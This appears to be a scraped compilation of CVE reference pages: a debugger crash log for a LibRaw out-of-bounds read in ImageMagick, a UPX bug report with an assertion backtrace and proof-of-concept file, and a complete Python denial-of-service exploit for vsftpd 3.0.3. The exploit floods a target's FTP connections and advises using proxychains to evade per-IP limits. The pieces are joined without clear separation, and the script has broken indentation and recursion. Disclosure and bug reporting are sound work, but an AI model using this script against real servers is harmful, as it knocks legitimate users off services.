ModLoad: 00007ff8 86e10000 00007ff8 87146000 C:\\WINDOWS\\System32\\combase.dll  
ModLoad: 00007ff8 85d20000 00007ff8 85da0000 C:\\WINDOWS\\System32\\bcryptPrimitives.dll  
ModLoad: 00007ff8 84e30000 00007ff8 855af000 C:\\WINDOWS\\System32\\windows.storage.dll  
ModLoad: 00007ff8 84e10000 00007ff8 84e2f000 C:\\WINDOWS\\System32\\profapi.dll  
ModLoad: 00007ff8 84d80000 00007ff8 84dca000 C:\\WINDOWS\\System32\\powrprof.dll  
ModLoad: 00007ff8 84d70000 00007ff8 84d80000 C:\\WINDOWS\\System32\\UMPDC.dll  
ModLoad: 00007ff8 87910000 00007ff8 87962000 C:\\WINDOWS\\System32\\shlwapi.dll  
ModLoad: 00007ff8 84dd0000 00007ff8 84de1000 C:\\WINDOWS\\System32\\kernel.appcore.dll  
ModLoad: 00007ff8 857b0000 00007ff8 857c7000 C:\\WINDOWS\\System32\\cryptsp.dll  
ModLoad: 00007ff8 87a50000 00007ff8 87ba6000 C:\\WINDOWS\\System32\\ole32.dll  
ModLoad: 00007ff8 842f0000 00007ff8 8432a000 C:\\WINDOWS\\SYSTEM32\\IPHLPAPI.DLL  
ModLoad: 00007ff8 84330000 00007ff8 843fa000 C:\\WINDOWS\\SYSTEM32\\DNSAPI.dll  
ModLoad: 00007ff8 87900000 00007ff8 87908000 C:\\WINDOWS\\System32\\NSI.dll  
ModLoad: 00007ff8 6e090000 00007ff8 6e0f8000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_libxml\_.dll  
(2adc.2ae0): Break instruction exception - code 80000003 (first chance)  
ntdll!LdrInitShimEngineDynamic+0x35c:  
00007ff8 87f7121c cc int 3  
0:000> g  
ModLoad: 00007ff8 86000000 00007ff8 8602e000 C:\\WINDOWS\\System32\\IMM32.DLL  
ModLoad: 00007ff8 77200000 00007ff8 7720a000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\modules\\coders\\IM\_MOD\_RL\_DNG\_.dll  
ModLoad: 00007ff8 5fe70000 00007ff8 5ff74000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_libraw\_.dll  
ModLoad: 00007ff8 6df60000 00007ff8 6e006000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\MSVCP120.dll  
(2adc.2ae0): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
CORE\_RL\_libraw\_!LibRaw::stretch+0x17d:  
00007ff8 5febc7ed 430fb70402 movzx eax,word ptr \[r10+r8\] ds:000002c7 284ac5c0=????  
0:000> k  
Child-SP RetAddr Call Site  
00 000000e1 ef2f3af0 00007ff8 5fedb222 CORE\_RL\_libraw\_!LibRaw::stretch+0x17d  
01 000000e1 ef2f3b70 00007ff8 772016b4 CORE\_RL\_libraw\_!LibRaw::dcraw\_process+0x562  
02 000000e1 ef2f3be0 00007ff8 6e6704ac IM\_MOD\_RL\_DNG\_+0x16b4  
03 000000e1 ef2f5c70 00007ff8 6e670fbc CORE\_RL\_MagickCore\_!ReadImage+0x47c  
04 000000e1 ef2fadc0 00007ff8 6e569636 CORE\_RL\_MagickCore\_!ReadImages+0x1ac  
05 000000e1 ef2fbe40 00007ff8 6e5ac907 CORE\_RL\_MagickWand\_!ConvertImageCommand+0x566  
06 000000e1 ef2fd760 00007ff7 93fc130b CORE\_RL\_MagickWand\_!MagickCommandGenesis+0x5a7  
07 000000e1 ef2fe920 00007ff7 93fc13ec image00007ff7\_93fc0000+0x130b  
08 000000e1 ef2ffb30 00007ff7 93fc1783 image00007ff7\_93fc0000+0x13ec  
09 000000e1 ef2ffb60 00007ff8 87bc7bd4 image00007ff7\_93fc0000+0x1783  
0a 000000e1 ef2ffb90 00007ff8 87f0ced1 KERNEL32!BaseThreadInitThunk+0x14  
0b 000000e1 ef2ffbc0 00000000 00000000 ntdll!RtlUserThreadStart+0x21

**System Configuration**

*   ImageMagick:  
    Version: ImageMagick-7.0.9-Q16 https://imagemagick.org  
    License: https://imagemagick.org/script/license.php
*   Environment (Operating system, version and so on):  
    Distributor ID: Microsoft Windows  
    Description: Windows 10

CVE-2020-22628: "LibRaw::stretch()" Out-of-bounds read vulnerability · Issue #269 · LibRaw/LibRaw

Reachable Assertion vulnerability in upx before 4.0.0 allows attackers to cause a denial of service via crafted file passed to the the readx function.

**What's the problem (or question)?**

Assertion \`(unsigned)len <= buf->getSize()' failed in file.cpp:275

upx.out: file.cpp:275: virtual int InputFile::readx(MemBuffer\*, int): Assertion \`(unsigned)len <= buf\-\>getSize()' failed.
Program received signal SIGABRT, Aborted.

    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7bcc859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7bcc729 in __assert_fail_base (fmt=0x7ffff7d62588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=<optimized out>) at assert.c:92
    #3  0x00007ffff7bddf36 in __GI___assert_fail (assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=0x5555555f5638 "virtual int InputFile::readx(MemBuffer*, int)") at assert.c:101
    #4  0x000055555558a280 in InputFile::readx(MemBuffer*, int) ()
    #5  0x00005555555c5969 in PackUnix::packExtent(PackUnix::Extent const&, Filter*, OutputFile*, unsigned int, unsigned int) ()
    #6  0x00005555555b4fb2 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::pack2(OutputFile*, Filter&) ()
    #7  0x00005555555c4d98 in PackUnix::pack(OutputFile*) ()
    #8  0x00005555555d6028 in Packer::doPack(OutputFile*) ()
    #9  0x00005555555eacd3 in do_one_file(char const*, char*) ()
    #10 0x00005555555eaf8f in do_files(int, int, char**) ()
    #11 0x00005555555973c7 in upx_main(int, char**) ()
    #12 0x000055555557c4e2 in main ()
    #13 0x00007ffff7bce0b3 in __libc_start_main (main=0x55555557c3e0 <main>, argc=2, argv=0x7fffffffe208, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1f8) at ../csu/libc-start.c:308
    #14 0x000055555557c5fe in _start ()
    

**What should have happened?**

No crash.

**Do you have an idea for a solution?**

No.

**How can we reproduce the issue?**

1.make  
2../src/upx.out ./poc  
poc.zip

**Please tell us details about your environment.**

*   ./upx.out --version  
    upx 4.0.0-git-5d1347a359bb  
    UCL data compression library 1.03  
    zlib data compression library 1.2.11  
    LZMA SDK version 4.43
*   Host Operating System and version: Ubuntu 20.04 focal
*   Host CPU architecture: AMD E  
    poc.zip  
    PYC 7742 64-Core @ 16x 2.25GHz
*   Target Operating System and version: Ubuntu 20.04 focal
*   Target CPU architecture: AMD EPYC 7742 64-Core @ 16x 2.25GHz

CVE-2021-46179: Assertion `(unsigned)len <= buf->getSize()' failed in file.cpp:275 · Issue #545 · upx/upx

VSFTPD 3.0.3 allows attackers to cause a denial of service due to limited number of connections allowed.

**vsftpd 3.0.3 - Remote Denial of Service**

    # Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
    # Date: 22-03-2021
    # Exploit Author: xynmaps
    # Vendor Homepage: https://security.appspot.com/vsftpd.html
    # Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
    # Version: 3.0.3
    # Tested on: Parrot Security OS 5.9.0
    
    #-------------------------------#
    
    #encoding=utf8
    #__author__ = XYN/Dump/NSKB3
    #VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
    """
    VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
    you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
    (if it's limited, just run this script from different proxies using proxychains, and it will work)
    """
    
    import socket
    import sys
    import threading
    import subprocess
    import time
    
    banner = """
    ._________________.
    |     VS-FTPD     |
    |      D o S      |
    |_________________|
    |By XYN/DUMP/NSKB3|
    |_|_____________|_|
    |_|_|_|_____|_|_|_|
    |_|_|_|_|_|_|_|_|_|
    
    """
    usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
    
    def test(t,p):
    	s = socket.socket()
    	s.settimeout(10)
    	try:
    		s.connect((t, p))
    		response = s.recv(65535)
    		s.close()
    		return 0
    	except socket.error:
    		print("Port {} is not open, please specify a port that is open.".format(p))
    		sys.exit()
    def attack(targ, po, id):
    	try:
    		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    		#print("Worker {} running".format(id))
    	except OSError: pass
    def main():
    	global target, port, start
    	print banner
    	try:
    		target = sys.argv[1]
    	except:
    		print usage
    		sys.exit()
    	try:
    		port = int(sys.argv[2])
    	except:
    		port = 21
    	try:
    		conns = int(sys.argv[3])
    	except:
    		conns = 50
    	print("[!] Testing if {0}:{1} is open".format(target, port))
    	test(target, port)
    	print("[+] Port {} open, starting attack...".format(port))
    	time.sleep(2)
    	print("[+] Attack started on {0}:{1}!".format(target, port))
    	def loop(target, port, conns):
    		global start
    		threading.Thread(target=timer).start()
    		while 1:
    			for i in range(1, conns + 3):
    				t = threading.Thread(target=attack, args=(target,port,i,))
    				t.start()
    				if i > conns + 2:
    					t.join()
    					break
    					loop()
    
    	t = threading.Thread(target=loop, args=(target, port, conns,))
    	t.start()
    
    def timer():
            start = time.time()
            while 1:
                    if start < time.time() + float(900): pass
                    else:
                            subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                            t = threading.Thread(target=loop, args=(target, port,))
    			t.start()
                            break
    
    main()

Source

CVE